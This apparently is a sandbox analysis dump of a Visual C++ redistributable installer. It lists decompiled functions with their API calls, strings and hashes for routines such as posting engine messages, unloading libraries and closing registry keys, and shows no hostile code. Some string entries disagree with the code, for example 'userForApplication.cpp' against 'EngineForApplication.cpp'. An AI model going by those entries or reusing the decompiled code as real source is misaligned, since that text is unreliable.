                                                                          					E000137D3(_t10, "userexperience.cpp", 0xea, _t18);
                                                                          					_push("Engine active cannot be changed because it was already in that state.");
                                                                          					_push(_t18);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t18;
                                                                          			}


                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3AC
                                                                          • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0001D3BB
                                                                          • LeaveCriticalSection.KERNEL32(000000D0,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3D0
                                                                          Strings
                                                                          • userexperience.cpp, xrefs: 0001D3E9
                                                                          • user active cannot be changed because it was already in that state., xrefs: 0001D3F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                          • String ID: user active cannot be changed because it was already in that state.$userexperience.cpp
                                                                          • API String ID: 3376869089-1544469594
                                                                          • Opcode ID: dfe368c0ffc3165c89476c3a7966bc7586c96c4b1ee24ee83058d35b955671dc
                                                                          • Instruction ID: 83b7fedcc5e1cab484a5f2681c4c488afe052afc5b96d8a0d887322e7bd40aab
                                                                          • Opcode Fuzzy Hash: dfe368c0ffc3165c89476c3a7966bc7586c96c4b1ee24ee83058d35b955671dc
                                                                          • Instruction Fuzzy Hash: 0AF0AF763007056BA7106EA6AC84DEB73ADFB85766700442ABA01C7540DB74F9458735
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 20%
                                                                          			E00044897(void* __ecx, intOrPtr _a4) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t10;
                                                                          				struct HINSTANCE__** _t12;
                                                                          				void* _t18;
                                                                          				void* _t23;
                                                                          				void* _t24;
                                                                          				void* _t25;
                                                                          				intOrPtr* _t26;
                                                                          				signed int _t27;
                                                                          
                                                                          				_t10 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t10 ^ _t27;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t12 =  &_v12;
                                                                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                                                          				if(_t12 != 0) {
                                                                          					_push(_t25);
                                                                          					_t26 = GetProcAddress(_v12, "CorExitProcess");
                                                                          					if(_t26 != 0) {
                                                                          						 *0x5b3d0(_a4);
                                                                          						 *_t26();
                                                                          					}
                                                                          					_pop(_t25);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					FreeLibrary(_v12);
                                                                          				}
                                                                          				return E0003DE36(_t18, _v8 ^ _t27, _t23, _t24, _t25);
                                                                          			}


                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00044848,00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002), ref: 000448B7
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000448CA
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00044848,00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002), ref: 000448ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 552480f90908666eea2df5b8ad79f485eae5c0cbb95ab2c84fcfb09a5c1ba28d
                                                                          • Instruction ID: 8bcd836543938873cc966fa86fff5041073a4a5fcde49dc5189c01df3d00ae32
                                                                          • Opcode Fuzzy Hash: 552480f90908666eea2df5b8ad79f485eae5c0cbb95ab2c84fcfb09a5c1ba28d
                                                                          • Instruction Fuzzy Hash: 5BF04F74A00208BBDB559BA4DC19BEEBFB8EF44752F4041A9F809A6190DF785E44CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 33%
                                                                          			E0002EA72(intOrPtr _a4, long _a8) {
                                                                          				signed short _t9;
                                                                          				intOrPtr _t13;
                                                                          				int _t16;
                                                                          
                                                                          				_t13 = _a4;
                                                                          				_t16 = 0;
                                                                          				if( *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc)) + 0x4b0)) == 0xffffffff) {
                                                                          					if(PostThreadMessageW( *(_t13 + 0x10), 0x9002, 0, _a8) == 0) {
                                                                          						_t9 = GetLastError();
                                                                          						_t19 =  <=  ? _t9 : _t9 & 0x0000ffff | 0x80070000;
                                                                          						_t16 =  >=  ? 0x80004005 :  <=  ? _t9 : _t9 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "EngineForApplication.cpp", 0x2a5, _t16);
                                                                          						_push("Failed to post elevate message.");
                                                                          						_push(_t16);
                                                                          						E0005012F();
                                                                          					}
                                                                          				} else {
                                                                          					_t16 = 0x800704df;
                                                                          				}
                                                                          				return _t16;
                                                                          			}


                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post elevate message.
                                                                          • API String ID: 2609174426-4257857053
                                                                          • Opcode ID: 600ae1602b687031708991d69f301d817a61c34f793e4f7e0f41bdaabc6b3d8d
                                                                          • Instruction ID: da3fb69362e8a3a2f94cd3c838f11f6c5c214c573cb366187717a8173239cbf7
                                                                          • Opcode Fuzzy Hash: 600ae1602b687031708991d69f301d817a61c34f793e4f7e0f41bdaabc6b3d8d
                                                                          • Instruction Fuzzy Hash: B6F0F036780330ABE3206AA9AC09AA737C8EF04761F114229FE18EB5D1D7259C0186E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E0001D7CF(intOrPtr _a4) {
                                                                          				_Unknown_base(*)()* _t12;
                                                                          				signed int _t18;
                                                                          				void* _t19;
                                                                          				intOrPtr _t22;
                                                                          
                                                                          				_t22 = _a4;
                                                                          				_t19 = 0;
                                                                          				_t18 =  *(_t22 + 0x10);
                                                                          				if(_t18 != 0) {
                                                                          					 *((intOrPtr*)( *_t18 + 8))(_t18);
                                                                          					 *(_t22 + 0x10) =  *(_t22 + 0x10) & 0;
                                                                          				}
                                                                          				if( *(_t22 + 0xc) != _t19) {
                                                                          					_t12 = GetProcAddress( *(_t22 + 0xc), "BootstrapperApplicationDestroy");
                                                                          					if(_t12 != 0) {
                                                                          						 *_t12();
                                                                          					}
                                                                          					if(FreeLibrary( *(_t22 + 0xc)) == 0) {
                                                                          						_t19 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					}
                                                                          					 *(_t22 + 0xc) =  *(_t22 + 0xc) & 0x00000000;
                                                                          				}
                                                                          				return _t19;
                                                                          			}


                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0001D7F6
                                                                          • FreeLibrary.KERNEL32(?,?,000147D1,00000000,?,?,00015386,?,?), ref: 0001D805
                                                                          • GetLastError.KERNEL32(?,000147D1,00000000,?,?,00015386,?,?), ref: 0001D80F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFreeLastLibraryProc
                                                                          • String ID: @Met$BootstrapperApplicationDestroy
                                                                          • API String ID: 1144718084-3300157853
                                                                          • Opcode ID: 3690f375e41a8f320371adb3e0fcd80f046523dd704ccc024e070d7a4d692027
                                                                          • Instruction ID: a4ea33a180783d18a3a05af89c90c8617f9429b8d54d9f9d3fc3928d91436f5c
                                                                          • Opcode Fuzzy Hash: 3690f375e41a8f320371adb3e0fcd80f046523dd704ccc024e070d7a4d692027
                                                                          • Instruction Fuzzy Hash: 73F0F9362007019FE7205FA6DC08AA7B7E9BF80763B01C53EE966C6560DB79E854CB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E0002F086(intOrPtr _a4, long _a8) {
                                                                          				signed short _t7;
                                                                          				int _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				if(PostThreadMessageW( *(_a4 + 0x10), 0x9001, 0, _a8) == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "EngineForApplication.cpp", 0x292, _t13);
                                                                          					_push("Failed to post plan message.");
                                                                          					_push(_t13);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}






                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post plan message.
                                                                          • API String ID: 2609174426-3019743703
                                                                          • Opcode ID: 94599b0302888b7a5522f80066f25edcbd4c7d52ba9cca0f2435f251d19c0b79
                                                                          • Instruction ID: 626a553b0b7c64cff5782d2b8b937708659cd92e436a75d74d1110b6339d1d74
                                                                          • Opcode Fuzzy Hash: 94599b0302888b7a5522f80066f25edcbd4c7d52ba9cca0f2435f251d19c0b79
                                                                          • Instruction Fuzzy Hash: 24F0E5327443317BE7202AAAAC09ED77BC9EF04BA1F014021FE0CEB092D625DC0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E0002F194(intOrPtr _a4, int _a8) {
                                                                          				signed short _t7;
                                                                          				long _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				if(PostThreadMessageW( *(_a4 + 0x10), 0x9005, _a8, 0) == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "EngineForApplication.cpp", 0x2c3, _t13);
                                                                          					_push("Failed to post shutdown message.");
                                                                          					_push(_t13);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}






                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post shutdown message.
                                                                          • API String ID: 2609174426-1833910594
                                                                          • Opcode ID: 845e5941340a0f32ce0c1ef896e70a224541c64cc35ff93c4f41c5dc128807d2
                                                                          • Instruction ID: 097e6a441764b61b9a91544208d9077bb5d6ecb3cae67252b5810f73a3b96583
                                                                          • Opcode Fuzzy Hash: 845e5941340a0f32ce0c1ef896e70a224541c64cc35ff93c4f41c5dc128807d2
                                                                          • Instruction Fuzzy Hash: F6F0EC337403317BF7206AAAAC09ED77BD8EF04BA1F014025FE08EB091D615DD0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEvent.KERNEL32(0005B468,00000000,?,0003145A,?,00000000,?,0001C121,?,000152FD,?,000273B2,?,?,000152FD,?), ref: 00030524
                                                                          • GetLastError.KERNEL32(?,0003145A,?,00000000,?,0001C121,?,000152FD,?,000273B2,?,?,000152FD,?,0001533D,00000001), ref: 0003052E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorEventLast
                                                                          • String ID: @Met$Failed to set begin operation event.$cabextract.cpp
                                                                          • API String ID: 3848097054-3980609822
                                                                          • Opcode ID: ae57e1606070e964b57d58955594596b9ba0baf9821b6e734783743dacfeed99
                                                                          • Instruction ID: 53c18ffcdcdb6ca203efc093704003869b6a062568bd473c2cb8a28b9a82f116
                                                                          • Opcode Fuzzy Hash: ae57e1606070e964b57d58955594596b9ba0baf9821b6e734783743dacfeed99
                                                                          • Instruction Fuzzy Hash: 44F0E533B05B306BE72176B96C06AEB76DCCF09BA1F010126FE09FB191EA159D0046E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E0002E978(intOrPtr _a4, long _a8) {
                                                                          				signed short _t7;
                                                                          				int _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				if(PostThreadMessageW( *(_a4 + 0x10), 0x9003, 0, _a8) == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "EngineForApplication.cpp", 0x2b4, _t13);
                                                                          					_push("Failed to post apply message.");
                                                                          					_push(_t13);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}






                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post apply message.
                                                                          • API String ID: 2609174426-2658443504
                                                                          • Opcode ID: 6478dddd089baf2e386f15037ca3c25e1c063e95054c6ed526b443ea0025bc4f
                                                                          • Instruction ID: 3869fca96befbd11d01d9e605bb4606a57cb0bef5c5138e97671957c8663bb76
                                                                          • Opcode Fuzzy Hash: 6478dddd089baf2e386f15037ca3c25e1c063e95054c6ed526b443ea0025bc4f
                                                                          • Instruction Fuzzy Hash: 26F0EC327403307BE7203AA9AC05ED77BC8DF04BA1F010026FE08FB091D625DD0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E0002EA09(intOrPtr _a4, long _a8) {
                                                                          				signed short _t7;
                                                                          				int _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				if(PostThreadMessageW( *(_a4 + 0x10), 0x9000, 0, _a8) == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "EngineForApplication.cpp", 0x283, _t13);
                                                                          					_push("Failed to post detect message.");
                                                                          					_push(_t13);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}






                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post detect message.
                                                                          • API String ID: 2609174426-346287489
                                                                          • Opcode ID: c9f1bdbabba74f09f70b0f66e345a774c1d053266272ebe27046869601fa7bf0
                                                                          • Instruction ID: 72111715684d38e459963a30a5e457cbd61758e159a028baca2ad9f67e99ef2f
                                                                          • Opcode Fuzzy Hash: c9f1bdbabba74f09f70b0f66e345a774c1d053266272ebe27046869601fa7bf0
                                                                          • Instruction Fuzzy Hash: 53F0A032B403316BE7206AAAAC09F977BC8EF04BA1F014121FE08EA091D625DE00C6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 38%
                                                                          			E00055D7F(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, void** _a32, void** _a36, intOrPtr _a40) {
                                                                          				int _v8;
                                                                          				void* _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				WCHAR* _v24;
                                                                          				intOrPtr* _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				void _v40;
                                                                          				void* _t33;
                                                                          				intOrPtr* _t42;
                                                                          				void* _t43;
                                                                          				signed short _t46;
                                                                          				void* _t50;
                                                                          				void* _t62;
                                                                          				WCHAR* _t63;
                                                                          				intOrPtr* _t64;
                                                                          				signed int _t65;
                                                                          				intOrPtr* _t67;
                                                                          				WCHAR* _t68;
                                                                          				void* _t71;
                                                                          				void* _t75;
                                                                          				void* _t76;
                                                                          				WCHAR* _t77;
                                                                          
                                                                          				_t75 = 0;
                                                                          				_t62 = 0;
                                                                          				_t65 = 7;
                                                                          				_t33 = memset( &_v40, 0, _t65 << 2);
                                                                          				_v8 = 0;
                                                                          				_t71 = _t33;
                                                                          				while(1) {
                                                                          					_v12 = _t75;
                                                                          					if(_t62 != 0) {
                                                                          						 *0x7a96c(_t62);
                                                                          						_t62 = _t75;
                                                                          						_v8 = _t62;
                                                                          					}
                                                                          					if(_t71 != 0) {
                                                                          						 *0x7a96c(_t71);
                                                                          						_t71 = _t75;
                                                                          					}
                                                                          					_t76 = E00058C77( *_a8,  &_v40);
                                                                          					if(_t76 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t77 = _a24;
                                                                          					if(_t77 == 0) {
                                                                          						L9:
                                                                          						_t68 = _v24;
                                                                          						L10:
                                                                          						_t42 = _a20;
                                                                          						if(_t42 == 0) {
                                                                          							L12:
                                                                          							_t67 = _v28;
                                                                          							L13:
                                                                          							_t43 = 3;
                                                                          							_t44 =  ==  ? 1 : _t43;
                                                                          							_t71 =  *0x7a994(_a4, _v36, _v32, _t67, _t68,  ==  ? 1 : _t43, 0, 0);
                                                                          							if(_t71 == 0) {
                                                                          								_t46 = GetLastError();
                                                                          								_t80 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
                                                                          								_t76 =  >=  ? 0x80004005 :  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "dlutil.cpp", 0x1fe, _t76);
                                                                          								break;
                                                                          							}
                                                                          							_t63 = _a20;
                                                                          							if(_t63 != 0 &&  *_t63 != 0 && _t77 != 0 &&  *_t77 != 0) {
                                                                          								_push(lstrlenW(_t63));
                                                                          								_push(_t63);
                                                                          								_t64 =  *0x7a970; // 0x5a79b
                                                                          								_push(0x2b);
                                                                          								_push(_t71);
                                                                          								if( *_t64() != 0) {
                                                                          									 *_t64(_t71, 0x2c, _t77, lstrlenW(_t77));
                                                                          								}
                                                                          							}
                                                                          							_t50 = E00055F0F(_t67, _t71, _a12, _v40, _v20, _v16, _a16,  &_v8);
                                                                          							_t62 = _v8;
                                                                          							_t76 = _t50;
                                                                          							if(_t76 >= 0) {
                                                                          								_t76 = E0005602B(_t67, _t62, _a8, _a28,  &_v12, _a40);
                                                                          								if(_t76 < 0) {
                                                                          									break;
                                                                          								}
                                                                          								if(_v12 != 0) {
                                                                          									_t75 = 0;
                                                                          									continue;
                                                                          								}
                                                                          								 *_a32 = _t71;
                                                                          								_t71 = 0;
                                                                          								 *_a36 = _t62;
                                                                          								_t62 = 0;
                                                                          							}
                                                                          							break;
                                                                          						}
                                                                          						_t67 = _t42;
                                                                          						if( *_t42 != 0) {
                                                                          							goto L13;
                                                                          						}
                                                                          						goto L12;
                                                                          					}
                                                                          					_t68 = _t77;
                                                                          					if( *_t77 != 0) {
                                                                          						goto L10;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				E00058CA2( &_v40);
                                                                          				if(_t62 != 0) {
                                                                          					 *0x7a96c(_t62);
                                                                          				}
                                                                          				if(_t71 != 0) {
                                                                          					 *0x7a96c(_t71);
                                                                          				}
                                                                          				return _t76;
                                                                          			}




























                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: @Met$dlutil.cpp
                                                                          • API String ID: 1659193697-1896680629
                                                                          • Opcode ID: d531c8e9bb62894bb89f0bb6c0ba59a3c7b13be4356726c4860efccf3a6544e6
                                                                          • Instruction ID: 59c0c2d11a0e2c6a4aee69c9aa33a7062a9558a554df9bcb7497181f2625561f
                                                                          • Opcode Fuzzy Hash: d531c8e9bb62894bb89f0bb6c0ba59a3c7b13be4356726c4860efccf3a6544e6
                                                                          • Instruction Fuzzy Hash: 6951F432A00615ABDB219FA48C95DAFBBF9EF88752F054015FE05B7250DB35CD458BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0005937F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				void* _t58;
                                                                          				void* _t60;
                                                                          
                                                                          				_t58 = __ecx;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				_v24 = 0;
                                                                          				_t60 = E00050E3F(_a4,  *0x7a7e0, 0x20019,  &_v16);
                                                                          				if(_t60 == 0x80070002 || _t60 < 0) {
                                                                          					L17:
                                                                          					if(_v12 != 0) {
                                                                          						RegCloseKey(_v12);
                                                                          						_v12 = 0;
                                                                          					}
                                                                          					if(_v8 != 0) {
                                                                          						RegCloseKey(_v8);
                                                                          						_v8 = 0;
                                                                          					}
                                                                          					if(_v16 != 0) {
                                                                          						RegCloseKey(_v16);
                                                                          					}
                                                                          					return _t60;
                                                                          				} else {
                                                                          					_t60 = E00050E3F(_v16, _a8, 0x20019,  &_v8);
                                                                          					if(_t60 != 0x80070002 && _t60 >= 0) {
                                                                          						_t60 = E00050E3F(_v8,  *0x7a7e4, 0x20019,  &_v12);
                                                                          						if(_t60 != 0x80070002 && _t60 >= 0) {
                                                                          							_t60 = E00050B49(_t58, _v12, _a12, 0, 1);
                                                                          							if(_t60 < 0) {
                                                                          								goto L17;
                                                                          							}
                                                                          							_t60 = E00050E9B(_v12,  &_v20, 0);
                                                                          							if(_t60 >= 0 && _v20 <= 0) {
                                                                          								if(_v12 != 0) {
                                                                          									RegCloseKey(_v12);
                                                                          									_v12 = 0;
                                                                          								}
                                                                          								_t60 = E00050B49(_t58, _v8,  *0x7a7e4, 0, 0);
                                                                          								if(_t60 >= 0) {
                                                                          									_t60 = E00050E9B(_v8, 0,  &_v24);
                                                                          									if(_t60 >= 0 && _v24 == 0) {
                                                                          										if(_v8 != 0) {
                                                                          											RegCloseKey(_v8);
                                                                          											_v8 = 0;
                                                                          										}
                                                                          										_t60 = E00050B49(_t58, _v16, _a8, 0, 0);
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					goto L17;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 00059457
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00059492
